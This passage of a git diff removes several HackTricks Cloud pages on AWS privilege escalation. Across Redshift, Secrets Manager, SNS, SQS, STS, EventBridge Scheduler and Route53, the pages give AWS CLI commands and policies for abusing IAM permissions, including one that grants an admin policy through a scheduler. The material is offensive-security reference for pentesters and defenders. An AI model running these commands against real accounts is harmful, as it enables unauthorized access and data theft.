-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md
deleted file mode 100644
index 89b2282f2..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md
+++ /dev/null
@@ -1,44 +0,0 @@
-# AWS - Organizations Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Organizations
-
-For more information check:
-
-{% content-ref url="../aws-services/aws-organizations-enum.md" %}
-[aws-organizations-enum.md](../aws-services/aws-organizations-enum.md)
-{% endcontent-ref %}
-
-## From management Account to children accounts
-
-If you compromise the root/management account, chances are you can compromise all the children accounts.\
-To [**learn how check this page**](../#compromising-the-organization).
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md
deleted file mode 100644
index e5098c244..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md
+++ /dev/null
@@ -1,135 +0,0 @@
-# AWS - Redshift Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Redshift - -For more information about RDS check: - -{% content-ref url="../aws-services/aws-redshift-enum.md" %} -[aws-redshift-enum.md](../aws-services/aws-redshift-enum.md) -{% endcontent-ref %} - -### `redshift:DescribeClusters`, `redshift:GetClusterCredentials` - -With these permissions you can get **info of all the clusters** (including name and cluster username) and **get credentials** to access it: - -```bash -# Get creds -aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1 -# Connect, even if the password is a base64 string, that is the password -psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:" -d template1 -p 5439 -``` - -**Potential Impact:** Find sensitive info inside the databases. - -### `redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM` - -With these permissions you can get **info of all the clusters** and **get credentials** to access it.\ -Note that the postgres user will have the **permissions that the IAM identity** used to get the credentials has. - -```bash -# Get creds -aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1 -# Connect, even if the password is a base64 string, that is the password -psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439 -``` - -**Potential Impact:** Find sensitive info inside the databases. - -### `redshift:DescribeClusters`, `redshift:ModifyCluster?` - -It's possible to **modify the master password** of the internal postgres (redshit) user from aws cli (I think those are the permissions you need but I haven't tested them yet): - -``` -aws redshift modify-cluster –cluster-identifier –master-user-password ‘master-password’; -``` - -**Potential Impact:** Find sensitive info inside the databases. 
- -## Accessing External Services - -{% hint style="warning" %} -To access all the following resources, you will need to **specify the role to use**. A Redshift cluster **can have assigned a list of AWS roles** that you can use **if you know the ARN** or you can just set "**default**" to use the default one assigned. - -Moreover, as [**explained here**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), Redshift also allows to concat roles (as long as the first one can assume the second one) to get further access but just **separating** them with a **comma**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';` -{% endhint %} - -### Lambdas - -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/r\_CREATE\_EXTERNAL\_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), it's possible to **call a lambda function from redshift** with something like: - -```sql -CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT) -RETURNS INT -STABLE -LAMBDA 'lambda_function' -IAM_ROLE default; -``` - -### S3 - -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), it's possible to **read and write into S3 buckets**: - -```sql -# Read -copy table from 's3:///load/key_prefix' -credentials 'aws_iam_role=arn:aws:iam:::role/' -region '' -options; - -# Write -unload ('select * from venue') -to 's3://mybucket/tickit/unload/venue_' -iam_role default; -``` - -### Dynamo - -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/t\_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), it's possible to **get data from dynamodb**: - -```sql -copy favoritemovies -from 'dynamodb://ProductCatalog' -iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole'; -``` - -{% hint style="warning" %} -The 
Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) option to specify the AWS Region in which the Amazon DynamoDB table is located. -{% endhint %} - -### EMR - -Check [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html) - -## References - -* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md
deleted file mode 100644
index 8be266ddb..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md
+++ /dev/null
@@ -1,75 +0,0 @@
-# AWS - Secrets Manager Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Secrets Manager - -For more info about secrets manager check: - -{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} -[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md) -{% endcontent-ref %} - -### `secretsmanager:GetSecretValue` - -An attacker with this permission can get the **saved value inside a secret** in AWS **Secretsmanager**. - -```bash -aws secretsmanager get-secret-value --secret-id # Get value -``` - -**Potential Impact:** Access high sensitive data inside AWS secrets manager service. - -### `secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`) - -With the previous permissions it's possible to **give access to other principals/accounts (even external)** to access the **secret**. Note that in order to **read secrets encrypted** with a KMS key, the user also needs to have **access over the KMS key** (more info in the [KMS Enum page](../aws-services/aws-kms-enum.md)). - -```bash -aws secretsmanager list-secrets -aws secretsmanager get-resource-policy --secret-id -aws secretsmanager put-resource-policy --secret-id --resource-policy file:///tmp/policy.json -``` - -policy.json: - -```json -{ - "Version" : "2012-10-17", - "Statement" : [ { - "Effect" : "Allow", - "Principal" : { - "AWS" : "arn:aws:iam:::root" - }, - "Action" : "secretsmanager:GetSecretValue", - "Resource" : "*" - } ] -} -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md
deleted file mode 100644
index bdbe2bea2..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md
+++ /dev/null
@@ -1,71 +0,0 @@
-# AWS - SNS Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## SNS - -For more information check: - -{% content-ref url="../aws-services/aws-sns-enum.md" %} -[aws-sns-enum.md](../aws-services/aws-sns-enum.md) -{% endcontent-ref %} - -### `sns:Publish` - -An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources. - -```bash -aws sns publish --topic-arn --message -``` - -**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. - -### `sns:Subscribe` - -An attacker could subscribe or to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic. - -{% code overflow="wrap" %} -```bash -aws sns subscribe --topic-arn --protocol --endpoint -``` -{% endcode %} - -**Potential Impact**: Unauthorized access to messages (sensitve info), service disruption for applications relying on the affected topic. - -### `sns:AddPermission` - -An attacker could grant unauthorized users or services access to an SNS topic, potentially getting further permissions. - -```css -aws sns add-permission --topic-arn --label --aws-account-id --action-name -``` - -**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md
deleted file mode 100644
index 258084f11..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md
+++ /dev/null
@@ -1,74 +0,0 @@
-# AWS - SQS Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## SQS - -For more information check: - -{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %} -[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md) -{% endcontent-ref %} - -### `sqs:AddPermission` - -An attacker could use this permission to grant unauthorized users or services access to an SQS queue by creating new policies or modifying existing policies. This could result in unauthorized access to the messages in the queue or manipulation of the queue by unauthorized entities. - -{% code overflow="wrap" %} -```bash -cssCopy codeaws sqs add-permission --queue-url --actions --aws-account-ids --label -``` -{% endcode %} - -**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services. - -### `sqs:SendMessage` , `sqs:SendMessageBatch` - -An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources. - -```bash -aws sqs send-message --queue-url --message-body -aws sqs send-message-batch --queue-url --entries -``` - -**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. - -### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility` - -An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages. - -```bash -aws sqs receive-message --queue-url -aws sqs delete-message --queue-url --receipt-handle -aws sqs change-message-visibility --queue-url --receipt-handle --visibility-timeout -``` - -**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages. 
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md
deleted file mode 100644
index 1162ac6fe..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md
+++ /dev/null
@@ -1,153 +0,0 @@
-# AWS - STS Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## STS - -### `sts:AssumeRole` - -Every role is created with a **role trust policy**, this policy indicates **who can assume the created role**. If a role from the **same account** says that an account can assume it, it means that the account will be able to access the role (and potentially **privesc**). - -For example, the following role trust policy indicates that anyone can assume it, therefore **any user will be able to privesc** to the permissions associated with that role. - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "sts:AssumeRole" - } - ] -} -``` - -You can impersonate a role running: - -```bash -aws sts assume-role --role-arn $ROLE_ARN --role-session-name sessionname -``` - -**Potential Impact:** Privesc to the role. - -{% hint style="danger" %} -Note that in this case the permission `sts:AssumeRole` needs to be **indicated in the role to abuse** and not in a policy belonging to the attacker.\ -With one exception, in order to **assume a role from a different account** the attacker account **also needs** to have the **`sts:AssumeRole`** over the role. 
-{% endhint %} - -### **`sts:GetFederationToken`** - -With this permission it's possible to generate credentials to impersonate any user: - -```bash -aws sts get-federation-token --name -``` - -This is how this permission can be given securely without giving access to impersonate other users: - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "VisualEditor0", - "Effect": "Allow", - "Action": "sts:GetFederationToken", - "Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}" - } - ] -} -``` - -### `sts:AssumeRoleWithSAML` - -A trust policy with this role grants **users authenticated via SAML access to impersonate the role.** - -An example of a trust policy with this permission is: - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "OneLogin", - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin" - }, - "Action": "sts:AssumeRoleWithSAML", - "Condition": { - "StringEquals": { - "SAML:aud": "https://signin.aws.amazon.com/saml" - } - } - } - ] -} -``` - -To generate credentials to impersonate the role in general you could use something like: - -```bash -aws sts assume-role-with-saml --role-arn --principal-arn -``` - -But **providers** might have their **own tools** to make this easier, like [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role): - -{% code overflow="wrap" %} -```bash -onelogin-aws-assume-role --onelogin-subdomain mettle --onelogin-app-id 283740 --aws-region eu-west-1 -z 3600 -``` -{% endcode %} - -**Potential Impact:** Privesc to the role. - -### `sts:AssumeRoleWithWebIdentity` - -This permission grants permission to obtain a set of temporary security credentials for **users who have been authenticated in a mobile, web application, EKS...** with a web identity provider. 
[Learn more here.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html) - -For example, if an **EKS service account** should be able to **impersonate an IAM role**, it will have a token in **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** and can **assume the role and get credentials** doing something like: - -{% code overflow="wrap" %} -```bash -aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/ --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token -# The role name can be found in the metadata of the configuration of the pod -``` -{% endcode %} - -### Federation Abuse - -{% content-ref url="../aws-basic-information/aws-federation-abuse.md" %} -[aws-federation-abuse.md](../aws-basic-information/aws-federation-abuse.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md
deleted file mode 100644
index 9173fadf5..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md
+++ /dev/null
@@ -1,75 +0,0 @@
-# AWS - EventBridge Scheduler Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## EventBridge Scheduler - -More info EventBridge Scheduler in: - -{% content-ref url="../aws-services/eventbridgescheduler-enum.md" %} -[eventbridgescheduler-enum.md](../aws-services/eventbridgescheduler-enum.md) -{% endcontent-ref %} - -### `iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`) - -An attacker with those permissions will be able to **`create`|`update` an scheduler and abuse the permissions of the scheduler role** attached to it to perform any action - -For example, they could configure the schedule to **invoke a Lambda function** which is a templated action: - -```bash -aws scheduler create-schedule \ - --name MyLambdaSchedule \ - --schedule-expression "rate(5 minutes)" \ - --flexible-time-window "Mode=OFF" \ - --target '{ - "Arn": "arn:aws:lambda:::function:", - "RoleArn": "arn:aws:iam:::role/" - }' -``` - -In addition to templated service actions, you can use **universal targets** in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. 
One example can be using universal targets adding "**AdminAccessPolicy**", using a role that has "**putRolePolicy**" policy: - -```bash -aws scheduler create-schedule \ - --name GrantAdminToTargetRoleSchedule \ - --schedule-expression "rate(5 minutes)" \ - --flexible-time-window "Mode=OFF" \ - --target '{ - "Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy", - "RoleArn": "arn:aws:iam:::role/RoleWithPutPolicy", - "Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}" - }' -``` - -## References - -* [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html) -* [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md b/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md
deleted file mode 100644
index 4a13f8e5c..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md
+++ /dev/null
@@ -1,59 +0,0 @@
-# AWS - Route53 Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-For more information about Route53 check:
-
-{% content-ref url="../aws-services/aws-route53-enum.md" %}
-[aws-route53-enum.md](../aws-services/aws-route53-enum.md)
-{% endcontent-ref %}
-
-### `route53:CreateHostedZone`, `route53:ChangeResourceRecordSets`, `acm-pca:IssueCertificate`, `acm-pca:GetCertificate`
-
-{% hint style="info" %}
-To perform this attack the target account must already have an [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** setup in the account, and EC2 instances in the VPC(s) must have already imported the certificates to trust it. With this infrastructure in place, the following attack can be performed to intercept AWS API traffic.
-{% endhint %}
-
-Other permissions **recommend but not required for the enumeration** part: `route53:GetHostedZone`, `route53:ListHostedZones`, `acm-pca:ListCertificateAuthorities`, `ec2:DescribeVpcs`
-
-Assuming there is an AWS VPC with multiple cloud-native applications talking to each other and to AWS API. Since the communication between the microservices is often TLS encrypted there must be a private CA to issue the valid certificates for those services. **If ACM-PCA is used** for that and the adversary manages to get **access to control both route53 and acm-pca private CA** with the minimum set of permissions described above, it can **hijack the application calls to AWS API** taking over their IAM permissions.
-
-This is possible because:
-
-* AWS SDKs do not have [Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning)
-* Route53 allows creating Private Hosted Zone and DNS records for AWS APIs domain names
-* Private CA in ACM-PCA cannot be restricted to signing only certificates for specific Common Names
-
